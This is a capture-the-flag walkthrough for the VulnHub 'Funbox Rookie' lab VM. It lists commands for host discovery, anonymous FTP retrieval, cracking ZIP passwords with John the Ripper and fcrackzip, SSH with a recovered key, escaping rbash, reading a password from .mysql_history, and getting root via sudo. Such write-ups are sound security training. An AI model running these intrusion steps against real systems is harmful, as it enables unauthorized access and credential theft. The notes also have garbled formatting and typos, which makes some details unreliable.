https://www.vulnhub.com/entry/funbox-rookie,520/
Discoving Target IP
sudo nmap -sn 192.168.122.0-255
sudo netdiscover -P -i eth0 -r 192.168.122.1/24
Scan Ports
nmap -p- 192.167.122.58
scan all open portsnmap -p 21,22,80 -sC -sV 192.168.122.58
to get more informations on those open ports
Port 80
- `nikto -h http://192.168.122.58 to check for possible vulnerabilities
- Server is using Apache 2.6.49, search for possible CVE or exploits https://www.exploit-db.com/exploits/50383
Port 21
ftp 192.168.122.58
to access FTP server on it, because from usingnmap
we know that using Anonymous login is ok, we can use usernameanonymous
and empty password- once we are in the FTP server,
ls -la
to show all files get <filename>
to download one of the filemget *
to download multiple or all filesexit
to leave FTP server
Cracking ZIP files
- we now have many zip files, but all of them are password protected.
we can try to use John the Ripper to crack it
zip2john tom.zip > tom.txt
will convert zip to hash filejohn tom.txt
will be able to crack it using default wordlistunzip tom.zip -d tom
and using passwordiubire
to unzip it
or we can try to use Fast Zip password cracker
gzip -d /usr/share/wordlists/rockyou.txt.gz
to decompress password listfcrackzip -u -D -p /usr/share/wordlists/rockyou.txt cathrine.zip
to crack it using Rockyou password listunzip catherine.zip -d catherine
Port 22
ssh tom@192.168.122.58 -i id_rsa
to SSH into the target machine as tom
Get out of rbash
- by default we are in a restricted shell
ssh tom@192.168.122.58 -i id_rsa -t "bash --noprofile"
to SSH into bash without profile- or just run
bash -i
- https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
Get user password
- Now we are in home directory of
tom
, list file byls -la
, and there is a hidden.mysql_history
file. - open it there is a line
insert\040into\040support\040(tom,\040xx11yy22!);
we can probably guess in(tom,\040xx11yy22!)
,tom
is the username, and\040xx11yy22!
is the password, but\040
is ASCII for space, sotom
’s password isxx11yy22!
Elevate Privilage
- now with tom’s username and password, run
sudo -l
to all commands thattom
can run withsudo
, it has
User root may run the following commands on funbox2:
(ALL : ALL) ALL
- so we can just run
sudo bash
to open a root shell
Capture the Flag
- navigate to
/root
- get
flag.txt